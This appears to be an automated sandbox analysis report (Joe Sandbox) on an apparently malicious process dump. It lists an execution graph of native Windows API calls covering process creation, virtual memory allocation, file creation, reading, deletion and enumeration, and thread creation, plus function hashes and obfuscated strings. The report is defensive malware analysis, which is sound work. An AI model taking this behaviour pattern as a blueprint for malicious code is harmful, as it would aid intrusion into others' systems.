                                                      Execution Coverage:2.4%
                                                      Dynamic/Decrypted Code Coverage:4.2%
                                                      Signature Coverage:2.2%
                                                      Total number of Nodes:453
                                                      Total number of Limit Nodes:73
                                                      execution_graph 100478 2dd851e 100479 2dd8523 100478->100479 100481 2dd84e2 100479->100481 100482 2dd6f60 LdrInitializeThunk LdrInitializeThunk 100479->100482 100482->100481 100004 2dd7358 100005 2dd7349 100004->100005 100008 2dd735b 100004->100008 100009 2ddaee0 100005->100009 100007 2dd734f 100010 2ddaf06 100009->100010 100011 2ddb122 100010->100011 100036 2de86b0 100010->100036 100011->100007 100013 2ddaf7c 100013->100011 100039 2deb3c0 100013->100039 100015 2ddaf98 100015->100011 100016 2ddb066 100015->100016 100045 2de79a0 100015->100045 100018 2dd59a0 LdrInitializeThunk 100016->100018 100021 2ddb085 100016->100021 100018->100021 100020 2ddb04e 100052 2dd7e40 100020->100052 100024 2ddb10a 100021->100024 100056 2de7570 100021->100056 100022 2ddaffa 100022->100011 100022->100020 100023 2ddb02c 100022->100023 100049 2dd59a0 100022->100049 100071 2de3b60 LdrInitializeThunk 100023->100071 100030 2dd7e40 LdrInitializeThunk 100024->100030 100032 2ddb118 100030->100032 100031 2ddb0e1 100061 2de7610 100031->100061 100032->100007 100034 2ddb0fb 100066 2de7750 100034->100066 100037 2de86cd 100036->100037 100038 2de86de CreateProcessInternalW 100037->100038 100038->100013 100040 2deb330 100039->100040 100042 2deb38d 100040->100042 100072 2dea290 100040->100072 100042->100015 100043 2deb36a 100075 2dea1b0 100043->100075 100046 2de79ba 100045->100046 100084 3742c0a 100046->100084 100047 2ddaff1 100047->100016 100047->100022 100051 2dd59da 100049->100051 100087 2de7b60 100049->100087 100051->100023 100053 2dd7e53 100052->100053 100093 2de78b0 100053->100093 100055 2dd7e7e 100055->100007 100057 2de75dc 100056->100057 100059 2de758e 100056->100059 100099 37439b0 LdrInitializeThunk 100057->100099 100058 2de75fe 100058->100031 100059->100031 100062 2de767f 100061->100062 100064 2de7631 100061->100064 100100 3744340 LdrInitializeThunk 100062->100100 100063 2de76a1 100063->100034 100064->100034 100067 2de77bf 100066->100067 100069 2de7771 100066->100069 100101 3742fb0 LdrInitializeThunk 100067->100101 100068 2de77e1 100068->100024 100069->100024 100071->100020 100078 2de85d0 100072->100078 100074 2dea2ab 100074->100043 100081 2de8620 100075->100081 100077 2dea1c9 100077->100042 100079 2de85ed 100078->100079 100080 2de85fb RtlAllocateHeap 100079->100080 100080->100074 100082 2de863d 100081->100082 100083 2de864b RtlFreeHeap 100082->100083 100083->100077 100085 3742c11 100084->100085 100086 3742c1f LdrInitializeThunk 100084->100086 100085->100047 100086->100047 100088 2de7bfc 100087->100088 100089 2de7b7e 100087->100089 100092 3742d10 LdrInitializeThunk 100088->100092 100089->100051 100090 2de7c3e 100090->100051 100092->100090 100094 2de7920 100093->100094 100096 2de78d1 100093->100096 100098 3742dd0 LdrInitializeThunk 100094->100098 100095 2de7942 100095->100055 100096->100055 100098->100095 100099->100058 100100->100063 100101->100068 100483 2dd2a17 100484 2dd2a38 100483->100484 100485 2dd6290 2 API calls 100484->100485 100486 2dd2a43 100485->100486 100487 2dc9690 100489 2dc969f 100487->100489 100488 2dc96e0 100489->100488 100490 2dc96cd CreateThread 100489->100490 100491 2dd7110 100492 2dd7129 100491->100492 100496 2dd717c 100491->100496 100494 2de82e0 NtClose 100492->100494 100492->100496 100493 2dd72a5 100495 2dd7144 100494->100495 100501 2dd6520 NtClose LdrInitializeThunk LdrInitializeThunk 100495->100501 100496->100493 100502 2dd6520 NtClose LdrInitializeThunk LdrInitializeThunk 100496->100502 100498 2dd727f 100498->100493 100503 2dd66f0 NtClose LdrInitializeThunk LdrInitializeThunk 100498->100503 100501->100496 100502->100498 100503->100493 100102 2de8250 100103 2de82b9 100102->100103 100105 2de8271 100102->100105 100104 2de82cc NtDeleteFile 100103->100104 100111 2de7950 100112 2de796d 100111->100112 100115 3742df0 LdrInitializeThunk 100112->100115 100113 2de7992 100115->100113 100504 2de8010 100505 2de80b6 100504->100505 100507 2de8032 100504->100507 100506 2de80c9 NtCreateFile 100505->100506 100118 2dd5b49 100119 2dd5b4e 100118->100119 100120 2dd5ad4 100118->100120 100121 2dd5ae6 100120->100121 100122 2de79a0 LdrInitializeThunk 100120->100122 100125 2de8370 100121->100125 100122->100121 100124 2dd5afb 100126 2de83ee 100125->100126 100128 2de838e 100125->100128 100130 3742e80 LdrInitializeThunk 100126->100130 100127 2de841c 100127->100124 100128->100124 100130->100127 100513 2dcb780 100514 2dea120 NtAllocateVirtualMemory 100513->100514 100515 2dccdf1 100514->100515 100131 2ddfb40 100132 2ddfb5d 100131->100132 100137 2dd4770 100132->100137 100134 2ddfb7b 100136 2ddfcfa 100134->100136 100141 2de60b0 100134->100141 100138 2dd4794 100137->100138 100139 2dd479b 100138->100139 100140 2dd47d0 LdrLoadDll 100138->100140 100139->100134 100140->100139 100142 2de610d 100141->100142 100143 2de6140 100142->100143 100146 2ddfe44 RtlFreeHeap 100142->100146 100143->100136 100145 2de6122 100145->100136 100146->100145 100147 2dd6d40 100148 2dd6d6a 100147->100148 100151 2dd7c70 100148->100151 100150 2dd6d8b 100152 2dd7c8d 100151->100152 100158 2de7a90 100152->100158 100154 2dd7cdd 100155 2dd7ce4 100154->100155 100156 2de7b60 LdrInitializeThunk 100154->100156 100155->100150 100157 2dd7d0d 100156->100157 100157->100150 100159 2de7b1a 100158->100159 100160 2de7aae 100158->100160 100163 3742f30 LdrInitializeThunk 100159->100163 100160->100154 100161 2de7b50 100161->100154 100163->100161 100164 2de14c0 100169 2de14cf 100164->100169 100165 2de1559 100166 2de1516 100167 2dea1b0 RtlFreeHeap 100166->100167 100168 2de1526 100167->100168 100169->100165 100169->100166 100170 2de1554 100169->100170 100171 2dea1b0 RtlFreeHeap 100170->100171 100171->100165 100177 3742ad0 LdrInitializeThunk 100178 2dd98fb 100179 2dd990a 100178->100179 100180 2dd9911 100179->100180 100181 2dea1b0 RtlFreeHeap 100179->100181 100181->100180 100182 2dc96f0 100184 2dc96ff 100182->100184 100183 2dca256 100184->100183 100186 2de9e40 100184->100186 100187 2de9e66 100186->100187 100192 2dc3ff0 100187->100192 100189 2de9e72 100191 2de9ea0 100189->100191 100195 2de4960 100189->100195 100191->100183 100199 2dd34a0 100192->100199 100194 2dc3ffd 100194->100189 100196 2de49ba 100195->100196 100197 2de49c7 100196->100197 100238 2dd1960 100196->100238 100197->100191 100201 2dd34b7 100199->100201 100200 2dd34cd 100200->100194 100201->100200 100203 2dd351b 100201->100203 100206 2de8d20 100201->100206 100203->100200 100213 2de5020 100203->100213 100205 2dd3541 100205->100194 100208 2de8d38 100206->100208 100207 2de8d5c 100207->100203 100208->100207 100209 2de79a0 LdrInitializeThunk 100208->100209 100210 2de8dae 100209->100210 100211 2dea1b0 RtlFreeHeap 100210->100211 100212 2de8dc7 100211->100212 100212->100203 100214 2de507d 100213->100214 100215 2de50a8 100214->100215 100218 2dd3120 100214->100218 100215->100205 100217 2de508a 100217->100205 100219 2dd3092 100218->100219 100219->100218 100223 2dd3283 100219->100223 100224 2dd7ac0 100219->100224 100223->100217 100225 2dd7ada 100224->100225 100229 2dd33ac 100224->100229 100233 2de7a40 100225->100233 100228 2de82e0 NtClose 100228->100229 100229->100223 100230 2de82e0 100229->100230 100231 2de82fa 100230->100231 100232 2de8308 NtClose 100231->100232 100232->100223 100234 2de7a5d 100233->100234 100237 37435c0 LdrInitializeThunk 100234->100237 100235 2dd7baa 100235->100228 100237->100235 100239 2dd199b 100238->100239 100254 2dd7bd0 100239->100254 100241 2dd19a3 100242 2dea290 RtlAllocateHeap 100241->100242 100252 2dd1c68 100241->100252 100243 2dd19b9 100242->100243 100244 2dea290 RtlAllocateHeap 100243->100244 100245 2dd19ca 100244->100245 100246 2dea290 RtlAllocateHeap 100245->100246 100247 2dd19d8 100246->100247 100253 2dd1a6b 100247->100253 100269 2dd69f0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100247->100269 100249 2dd4770 LdrLoadDll 100250 2dd1c25 100249->100250 100265 2de7080 100250->100265 100252->100197 100253->100249 100255 2dd7bfc 100254->100255 100256 2dd7ac0 2 API calls 100255->100256 100257 2dd7c1f 100256->100257 100258 2dd7c29 100257->100258 100259 2dd7c41 100257->100259 100261 2dd7c34 100258->100261 100262 2de82e0 NtClose 100258->100262 100260 2dd7c5d 100259->100260 100263 2de82e0 NtClose 100259->100263 100260->100241 100261->100241 100262->100261 100264 2dd7c53 100263->100264 100264->100241 100266 2de70da 100265->100266 100268 2de70e7 100266->100268 100270 2dd1c80 100266->100270 100268->100252 100269->100253 100286 2dd7ea0 100270->100286 100272 2dd2175 100272->100268 100273 2dd1ca0 100273->100272 100290 2de0b00 100273->100290 100276 2dd1ea1 100277 2deb3c0 2 API calls 100276->100277 100280 2dd1eb6 100277->100280 100278 2dd1cfe 100278->100272 100293 2deb290 100278->100293 100279 2dd7e40 LdrInitializeThunk 100282 2dd1ee1 100279->100282 100280->100282 100298 2dd0920 100280->100298 100282->100272 100282->100279 100283 2dd0920 LdrInitializeThunk 100282->100283 100283->100282 100284 2dd200f 100284->100282 100285 2dd7e40 LdrInitializeThunk 100284->100285 100285->100284 100287 2dd7ead 100286->100287 100288 2dd7ece SetErrorMode 100287->100288 100289 2dd7ed5 100287->100289 100288->100289 100289->100273 100302 2dea120 100290->100302 100292 2de0b21 100292->100278 100294 2deb2a6 100293->100294 100295 2deb2a0 100293->100295 100296 2dea290 RtlAllocateHeap 100294->100296 100295->100276 100297 2deb2cc 100296->100297 100297->100276 100299 2dd093d 100298->100299 100309 2de8540 100299->100309 100305 2de8430 100302->100305 100304 2dea151 100304->100292 100306 2de84b4 100305->100306 100308 2de844e 100305->100308 100307 2de84c7 NtAllocateVirtualMemory 100306->100307 100307->100304 100308->100304 100310 2de855a 100309->100310 100313 3742c70 LdrInitializeThunk 100310->100313 100311 2dd0942 100311->100284 100313->100311 100314 2ddc170 100316 2ddc199 100314->100316 100315 2ddc29d 100316->100315 100317 2ddc243 FindFirstFileW 100316->100317 100317->100315 100318 2ddc25e 100317->100318 100319 2ddc28f FindNextFileW 100318->100319 100319->100318 100320 2ddc296 FindClose 100319->100320 100320->100315 100321 2deb2f0 100322 2dea1b0 RtlFreeHeap 100321->100322 100323 2deb305 100322->100323 100324 2de77f0 100325 2de7871 100324->100325 100326 2de7811 100324->100326 100329 3742ee0 LdrInitializeThunk 100325->100329 100327 2de789f 100329->100327 100330 2de8170 100331 2de8206 100330->100331 100333 2de818e 100330->100333 100332 2de8219 NtReadFile 100331->100332 100516 2de1130 100517 2de114c 100516->100517 100518 2de1188 100517->100518 100519 2de1174 100517->100519 100521 2de82e0 NtClose 100518->100521 100520 2de82e0 NtClose 100519->100520 100522 2de117d 100520->100522 100523 2de1191 100521->100523 100526 2dea2d0 RtlAllocateHeap 100523->100526 100525 2de119c 100526->100525 100527 2ddc2a8 100528 2ddc28f FindNextFileW 100527->100528 100529 2ddc296 FindClose 100528->100529 100531 2ddc261 100528->100531 100530 2ddc29d 100529->100530 100531->100528 100334 2dd72e0 100335 2dd734f 100334->100335 100336 2dd72f5 100334->100336 100336->100335 100337 2ddaee0 9 API calls 100336->100337 100337->100335 100338 2ddf260 100339 2ddf2c4 100338->100339 100369 2dd6290 100339->100369 100341 2ddf3f4 100342 2ddf3ed 100342->100341 100376 2dd63a0 100342->100376 100345 2ddf593 100346 2de60b0 RtlFreeHeap 100347 2ddf48d 100346->100347 100348 2ddf5a2 100347->100348 100380 2ddf040 100347->100380 100349 2de82e0 NtClose 100348->100349 100351 2ddf5ac 100349->100351 100352 2ddf4a5 100352->100348 100353 2ddf4b0 100352->100353 100354 2dea290 RtlAllocateHeap 100353->100354 100355 2ddf4d9 100354->100355 100356 2ddf4f8 100355->100356 100357 2ddf4e2 100355->100357 100389 2ddef30 CoInitialize 100356->100389 100358 2de82e0 NtClose 100357->100358 100360 2ddf4ec 100358->100360 100361 2ddf506 100391 2de7de0 100361->100391 100363 2ddf582 100364 2de82e0 NtClose 100363->100364 100365 2ddf58c 100364->100365 100366 2dea1b0 RtlFreeHeap 100365->100366 100366->100345 100367 2ddf524 100367->100363 100368 2de7de0 LdrInitializeThunk 100367->100368 100368->100367 100370 2dd62c3 100369->100370 100371 2dd62e7 100370->100371 100395 2de7e80 100370->100395 100371->100342 100373 2dd630a 100373->100371 100374 2de82e0 NtClose 100373->100374 100375 2dd638c 100374->100375 100375->100342 100377 2dd63c5 100376->100377 100400 2de7c90 100377->100400 100381 2ddf05c 100380->100381 100382 2dd4770 LdrLoadDll 100381->100382 100384 2ddf07a 100382->100384 100383 2ddf083 100383->100352 100384->100383 100385 2dd4770 LdrLoadDll 100384->100385 100386 2ddf14e 100385->100386 100387 2dd4770 LdrLoadDll 100386->100387 100388 2ddf1ab 100386->100388 100387->100388 100388->100352 100390 2ddef95 100389->100390 100390->100361 100392 2de7dfa 100391->100392 100405 3742ba0 LdrInitializeThunk 100392->100405 100393 2de7e27 100393->100367 100396 2de7e9d 100395->100396 100399 3742ca0 LdrInitializeThunk 100396->100399 100397 2de7ec6 100397->100373 100399->100397 100401 2de7cad 100400->100401 100404 3742c60 LdrInitializeThunk 100401->100404 100402 2dd6439 100402->100345 100402->100346 100404->100402 100405->100393 100406 2dda9e0 100411 2dda710 100406->100411 100408 2dda9ed 100425 2dda3b0 100408->100425 100410 2ddaa09 100412 2dda735 100411->100412 100436 2dd8090 100412->100436 100415 2dda872 100415->100408 100417 2dda889 100417->100408 100418 2dda880 100418->100417 100422 2dda971 100418->100422 100451 2dd9e10 100418->100451 100421 2dda9c9 100423 2dea1b0 RtlFreeHeap 100421->100423 100422->100421 100460 2dda170 100422->100460 100424 2dda9d0 100423->100424 100424->100408 100426 2dda3c6 100425->100426 100433 2dda3d1 100425->100433 100427 2dea290 RtlAllocateHeap 100426->100427 100427->100433 100428 2dda3e7 100428->100410 100429 2dd8090 GetFileAttributesW 100429->100433 100430 2dda6de 100431 2dda6f7 100430->100431 100432 2dea1b0 RtlFreeHeap 100430->100432 100431->100410 100432->100431 100433->100428 100433->100429 100433->100430 100434 2dd9e10 RtlFreeHeap 100433->100434 100435 2dda170 RtlFreeHeap 100433->100435 100434->100433 100435->100433 100437 2dd80b1 100436->100437 100438 2dd80c3 100437->100438 100439 2dd80b8 GetFileAttributesW 100437->100439 100438->100415 100440 2de2790 100438->100440 100439->100438 100441 2de279e 100440->100441 100442 2de27a5 100440->100442 100441->100418 100443 2dd4770 LdrLoadDll 100442->100443 100444 2de27da 100443->100444 100445 2de27e9 100444->100445 100464 2de2260 LdrLoadDll 100444->100464 100447 2dea290 RtlAllocateHeap 100445->100447 100449 2de2984 100445->100449 100450 2de2802 100447->100450 100448 2dea1b0 RtlFreeHeap 100448->100449 100449->100418 100450->100448 100450->100449 100452 2dd9e36 100451->100452 100465 2ddd640 100452->100465 100454 2dd9e9d 100456 2dda020 100454->100456 100457 2dd9ebb 100454->100457 100455 2dda005 100455->100418 100456->100455 100458 2dd9cd0 RtlFreeHeap 100456->100458 100457->100455 100470 2dd9cd0 100457->100470 100458->100456 100461 2dda196 100460->100461 100462 2ddd640 RtlFreeHeap 100461->100462 100463 2dda212 100462->100463 100463->100422 100464->100445 100467 2ddd656 100465->100467 100466 2ddd663 100466->100454 100467->100466 100468 2dea1b0 RtlFreeHeap 100467->100468 100469 2ddd69c 100468->100469 100469->100454 100471 2dd9ce6 100470->100471 100474 2ddd6b0 100471->100474 100473 2dd9dec 100473->100457 100475 2ddd6d4 100474->100475 100476 2ddd76c 100475->100476 100477 2dea1b0 RtlFreeHeap 100475->100477 100476->100473 100477->100476 100532 2dd5a20 100533 2dd7e40 LdrInitializeThunk 100532->100533 100534 2dd5a50 100533->100534 100536 2dd5a7c 100534->100536 100537 2dd7dc0 100534->100537 100538 2dd7dd9 100537->100538 100539 2dd7e25 100538->100539 100544 2de76b0 100538->100544 100539->100534 100541 2dd7e15 100542 2dd7e31 100541->100542 100543 2de82e0 NtClose 100541->100543 100542->100534 100543->100539 100545 2de771f 100544->100545 100547 2de76d1 100544->100547 100549 3744650 LdrInitializeThunk 100545->100549 100546 2de7741 100546->100541 100547->100541 100549->100546 100550 2dd0da0 100551 2dd0db9 100550->100551 100552 2dd4770 LdrLoadDll 100551->100552 100553 2dd0dd7 100552->100553 100554 2dd0e23 100553->100554 100555 2dd0e10 PostThreadMessageW 100553->100555 100555->100554 100556 2de5320 100557 2de537a 100556->100557 100559 2de5387 100557->100559 100560 2de2ea0 100557->100560 100561 2dea120 NtAllocateVirtualMemory 100560->100561 100563 2de2ede 100561->100563 100562 2de2fe6 100562->100559 100563->100562 100564 2dd4770 LdrLoadDll 100563->100564 100566 2de2f24 100564->100566 100565 2de2f60 Sleep 100565->100566 100566->100562 100566->100565

                                                      Executed Functions

                                                      Function 02DC96F0 Relevance: 54.3, Strings: 43, Instructions: 579COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 165 2dc96f0-2dc9bc0 167 2dc9bca-2dc9bd4 165->167 168 2dc9c08-2dc9c12 167->168 169 2dc9bd6-2dc9bf5 167->169 172 2dc9c23-2dc9c2f 168->172 170 2dc9c06 169->170 171 2dc9bf7-2dc9c00 169->171 170->167 171->170 173 2dc9c4d-2dc9c54 172->173 174 2dc9c31-2dc9c3d 172->174 177 2dc9c86-2dc9c8d 173->177 178 2dc9c56-2dc9c84 173->178 175 2dc9c3f-2dc9c45 174->175 176 2dc9c4b 174->176 175->176 176->172 180 2dc9c8f-2dc9ca5 177->180 181 2dc9cb2-2dc9cb6 177->181 178->173 182 2dc9ca7-2dc9cad 180->182 183 2dc9cb0 180->183 184 2dc9cb8-2dc9cc0 181->184 185 2dc9d00-2dc9d07 181->185 182->183 183->177 188 2dc9cc7-2dc9cd9 184->188 189 2dc9cc2-2dc9cc6 184->189 186 2dc9d39-2dc9d56 185->186 187 2dc9d09-2dc9d37 185->187 190 2dc9d67-2dc9d70 186->190 187->185 191 2dc9cdb-2dc9cdf 188->191 192 2dc9ce0-2dc9ce2 188->192 189->188 193 2dc9d86-2dc9d90 190->193 194 2dc9d72-2dc9d84 190->194 191->192 195 2dc9ce4-2dc9ced 192->195 196 2dc9cf0-2dc9cfe 192->196 198 2dc9dca-2dc9ddb 193->198 199 2dc9d92-2dc9d9d 193->199 194->190 195->196 196->181 202 2dc9dec-2dc9df5 198->202 200 2dc9d9f-2dc9da3 199->200 201 2dc9da4-2dc9da6 199->201 200->201 205 2dc9da8-2dc9db7 201->205 206 2dc9db9-2dc9dc2 201->206 203 2dc9e0b 202->203 204 2dc9df7-2dc9e09 202->204 208 2dc9e12-2dc9e19 203->208 204->202 209 2dc9dc8 205->209 206->209 210 2dc9e4a 208->210 211 2dc9e1b-2dc9e48 208->211 209->193 212 2dc9e51-2dc9e5a 210->212 211->208 213 2dca0da-2dca0e1 212->213 214 2dc9e60-2dc9e6a 212->214 216 2dca256-2dca260 213->216 217 2dca0e7-2dca0f1 213->217 215 2dc9e7b-2dc9e87 214->215 218 2dc9eac-2dc9eb5 215->218 219 2dc9e89-2dc9e99 215->219 220 2dca271-2dca27d 216->220 221 2dca102-2dca10b 217->221 228 2dc9eda-2dc9ee1 218->228 229 2dc9eb7-2dc9ed8 218->229 224 2dc9eaa 219->224 225 2dc9e9b-2dc9ea4 219->225 226 2dca27f-2dca288 220->226 227 2dca295-2dca29f 220->227 222 2dca10d-2dca11f 221->222 223 2dca121-2dca12b 221->223 222->221 234 2dca13c-2dca148 223->234 224->215 225->224 236 2dca28a-2dca290 226->236 237 2dca293 226->237 232 2dca2b0-2dca2b9 227->232 230 2dc9f03-2dc9f06 228->230 231 2dc9ee3-2dc9f01 228->231 229->218 239 2dc9f0c-2dc9f10 230->239 231->228 240 2dca2cc-2dca2d6 232->240 241 2dca2bb-2dca2ca 232->241 242 2dca15e-2dca165 234->242 243 2dca14a-2dca15c 234->243 236->237 237->220 244 2dc9f39-2dc9f43 239->244 245 2dc9f12-2dc9f37 239->245 247 2dca2e7-2dca2f3 240->247 241->232 249 2dca19c-2dca1a6 242->249 250 2dca167-2dca19a 242->250 243->234 251 2dc9f54-2dc9f60 244->251 245->239 252 2dca30a-2dca314 247->252 253 2dca2f5-2dca308 247->253 254 2dca1b7-2dca1c3 249->254 250->242 255 2dc9f76-2dc9f85 251->255 256 2dc9f62-2dc9f74 251->256 253->247 258 2dca1ea-2dca1f3 254->258 259 2dca1c5-2dca1ce 254->259 263 2dca00f-2dca019 255->263 264 2dc9f8b-2dc9f95 255->264 256->251 260 2dca20f-2dca219 258->260 261 2dca1f5-2dca20d 258->261 265 2dca1d5-2dca1d7 259->265 266 2dca1d0-2dca1d4 259->266 267 2dca22a-2dca233 260->267 261->258 268 2dca02a-2dca034 263->268 269 2dc9fcd-2dc9fd7 264->269 270 2dc9f97-2dc9fb1 264->270 271 2dca1e8 265->271 272 2dca1d9-2dca1e2 265->272 266->265 275 2dca235-2dca241 267->275 276 2dca251 call 2de9e40 267->276 277 2dca08e-2dca0a2 268->277 278 2dca036-2dca08c 268->278 273 2dc9fe8-2dc9ff4 269->273 279 2dc9fb8-2dc9fba 270->279 280 2dc9fb3-2dc9fb7 270->280 271->254 272->271 281 2dca00a 273->281 282 2dc9ff6-2dca008 273->282 283 2dca24f 275->283 284 2dca243-2dca249 275->284 276->216 287 2dca0b3-2dca0bf 277->287 278->268 288 2dc9fbc-2dc9fc5 279->288 289 2dc9fcb 279->289 280->279 281->213 282->273 291 2dca21b-2dca224 283->291 284->283 292 2dca0d5 287->292 293 2dca0c1-2dca0d3 287->293 288->289 289->264 291->267 292->212 293->287
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ![$&$($1$67$9$:$:$;q$=q$A$A$BM$Be$C$E&$J$JN\$K.$N$O$Q$Q$Qz$R$V~E&$X$Y$Z$\$b$d$f$j$m`$u$uC$uP$y9$0$^$l$}y9
                                                      • API String ID: 0-1953769178
                                                      • Opcode ID: 63031c361e1967507541be4260cf6cd07389f5aaaabdd8b1647713a05a3d2458
                                                      • Instruction ID: 43ba425280bb8bc668c47b2906945e46819e50a07f27ebac5c0d177becbc8929
                                                      • Opcode Fuzzy Hash: 63031c361e1967507541be4260cf6cd07389f5aaaabdd8b1647713a05a3d2458
                                                      • Instruction Fuzzy Hash: F062B2B0D0522ACBEB28CF44C994BEDBBB2BB44308F2081D9C5596B384D7B95E85DF54
                                                      Function 02DDC170 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 02DDC254
                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 02DDC28F
                                                      • FindClose.KERNELBASE(?), ref: 02DDC29A
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: 21694489ce0a3650d5eaaae87c9f93644fc126f3e044ba9d29fa2387bb1c1b49
                                                      • Instruction ID: 6efba64b91cc942631293e958d1dbe85451f1b80bc7325f99e364e0a8e0e5427
                                                      • Opcode Fuzzy Hash: 21694489ce0a3650d5eaaae87c9f93644fc126f3e044ba9d29fa2387bb1c1b49
                                                      • Instruction Fuzzy Hash: 4D3152719007497BDB60EBA0CC85FEF777DDF44B08F148559B909A7280EA70AE84DBA0
                                                      Function 02DE8010 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtCreateFile.NTDLL(?,?,?,?,00000036,?,?,?,?,?,?), ref: 02DE80FA
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 079124ef3477967559f5727808a8982cd5504fe3d61613fd0eea355095ec3f31
                                                      • Instruction ID: 79247b1a82b11c940c4fbb68b572aafc6fa2d91e10da971f20429b6d69053dbc
                                                      • Opcode Fuzzy Hash: 079124ef3477967559f5727808a8982cd5504fe3d61613fd0eea355095ec3f31
                                                      • Instruction Fuzzy Hash: 1C31D0B5A01209AFDB54DF99D880EDEBBB9EF8C304F108219F919A7340D770A851CFA5
                                                      Function 02DE8170 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtReadFile.NTDLL(?,?,?,?,00000036,?,?,?,?), ref: 02DE8242
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 62d9692a72f8b1308e095212dea9c2c55fc95751e8724d1e63c09cc4a6b2651c
                                                      • Instruction ID: c9ecb9860d7d35c4d9ab9aa9564f6a452405594964f3972cc11babcc34de430b
                                                      • Opcode Fuzzy Hash: 62d9692a72f8b1308e095212dea9c2c55fc95751e8724d1e63c09cc4a6b2651c
                                                      • Instruction Fuzzy Hash: 4131C8B5A00609AFDB24DF99D880EDEB7B9EF88314F118209F919A7340D770A911CFA1
                                                      Function 02DE8430 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(02DD1CFE,?,02DE70E7,00000000,00000004,00003000,?,?,?,?,?,02DE70E7,02DD1CFE,02DE70E7,50FFFD9F,02DD1CFE), ref: 02DE84E4
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: fb478c230df1748140ca80267227f12761ee9c0927a232a7eff3a1499e660764
                                                      • Instruction ID: a61dd250fa92019b0edec833dc1e78c1e31f65313039dee4cf7d451f4919fc95
                                                      • Opcode Fuzzy Hash: fb478c230df1748140ca80267227f12761ee9c0927a232a7eff3a1499e660764
                                                      • Instruction Fuzzy Hash: D821ECB5A00649AFDB24EF99DC41EEF77B9EF88704F108509F919A7380D774A811CBA1
                                                      Function 02DE8250 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: e46a643d9d9823aea0ae1bd062fa72092a5539ba38b6ab707a48acb0fb379cff
                                                      • Instruction ID: bc16b41c735468f5fba5d90ea2a6ccd94cf3ba5f1f9f2e33d1385e81aa24ae21
                                                      • Opcode Fuzzy Hash: e46a643d9d9823aea0ae1bd062fa72092a5539ba38b6ab707a48acb0fb379cff
                                                      • Instruction Fuzzy Hash: CD016172A012147FE620EA94DC01FEB77ADEB85714F104109FA59AB281D7B1BD04CBF5
                                                      Function 02DE82E0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtClose.NTDLL(?,02DD33AC,001F0001,?,00000000,?,?,00000104), ref: 02DE8311
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: e3d868196a48d853df1b9d5794ef9ab97ac8e7f0c3363c65e698835d9533e37e
                                                      • Instruction ID: 9d3b5453b0b66c794585bf3946df9a2d7781451a58a705b374abad489013e0aa
                                                      • Opcode Fuzzy Hash: e3d868196a48d853df1b9d5794ef9ab97ac8e7f0c3363c65e698835d9533e37e
                                                      • Instruction Fuzzy Hash: 21E046362012147BC620BA5ACC41FDB776DDBC5724F504019FA09A7281C671B9188AF0
